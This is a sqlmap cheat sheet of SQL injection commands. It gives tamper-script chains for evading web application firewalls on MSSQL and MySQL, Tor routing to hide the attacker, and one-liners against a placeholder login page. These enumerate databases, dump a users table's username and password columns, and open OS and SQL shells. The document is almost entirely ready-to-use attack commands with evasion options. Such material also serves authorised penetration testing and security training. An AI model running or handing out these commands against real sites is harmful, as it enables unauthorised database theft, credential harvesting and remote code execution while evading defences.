# SqlMap

**WAF Bypass**

**1)MSSQL**

```
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

**2)MySQL**

```
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
```

**3)General tampering option**

```
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

**WAF bypass example string**

```
sudo sqlmap -m SQLtargets.txt -dbs --batch tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

#WAF bypass using TOR

sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor
```

**Scanning multiple targets**

```
sudo sqlmap -m SQLtargets.txt -dbs --batch  

```

{% embed url="<https://github.com/sqlmapproject/sqlmap/tree/master/tamper>" %}

**Easy Scanning option**\
\
`sqlmap -u "http://testsite.com/login.php"`\
\
**Scanning by using tor**\
\
`sqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5`\
\
**Scanning by manually setting the return time**\
\
`sqlmap -u "http://testsite.com/login.php" --time-sec 15`\
\
**List all databases at the site**\
\
`sqlmap -u "http://testsite.com/login.php" --dbs`\
\
**List all tables in a specific database**\
\
`sqlmap -u "http://testsite.com/login.php" -D site_db --tables`\
\
**Dump the contents of a DB table**\
\
`sqlmap -u "http://testsite.com/login.php" -D site_db -T users –dump`\
\
**List all columns in a table**\
\
`sqlmap -u "http://testsite.com/login.php" -D site_db -T users --columns`\
\
**Dump only selected columns**\
\
`sqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dump`\
\
**Dump a table from a database when you have admin credentials**\
\
`sqlmap -u "http://testsite.com/login.php" –method "POST" –data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users –dump`\
\
**Get OS Shell**\
\
`sqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shell`\
\
**Get SQL Shell**\
\
`sqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shell`\
\
**Injecting site.xml pages**

```
//Adjust according to underlying DB and target

sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"
```